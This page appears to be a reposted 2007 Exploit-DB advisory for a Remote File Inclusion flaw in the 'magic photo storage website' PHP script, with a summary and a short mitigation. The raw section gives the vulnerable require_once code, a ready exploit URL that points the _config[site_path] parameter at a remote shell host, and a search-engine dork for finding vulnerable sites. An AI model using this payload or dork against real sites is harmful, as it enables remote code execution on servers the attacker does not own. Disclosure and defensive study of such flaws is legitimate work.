magic photo storage website -- Remote File Inclusion

vendor:

magic photo storage website

by:

k1tk4t

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: magic photo storage website

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

magic photo storage website — Remote File Inclusion

The magic photo storage website is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability by injecting a malicious payload in the _config[site_path] parameter of the common_function.php file. This allows the attacker to include arbitrary remote files, potentially leading to remote code execution or sensitive data disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files. Additionally, it is important to keep the software up to date with the latest patches and security fixes.

Source

Exploit-DB raw data:

########################################################################
# magic photo storage website -- Remote File Inclusion
# Vendor         : http://www.scriptaty.net/magic-photo-storage-website.html
# Demo Site      : http://www.turnkeydemos.info/demo/picstorage/
# Found By       : k1tk4t - k1tk4t[4t]newhack.org
# Location       : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
common_function.php

bug;
require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';
########################################################################
exploit;
http://localhost/include/common_function.php?_config[site_path]=http://shell
########################################################################
Dork;
allinurl:catalog_login.php
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,fusion
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#asiahacker [all member asiahacker community]
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org

# milw0rm.com [2007-01-08]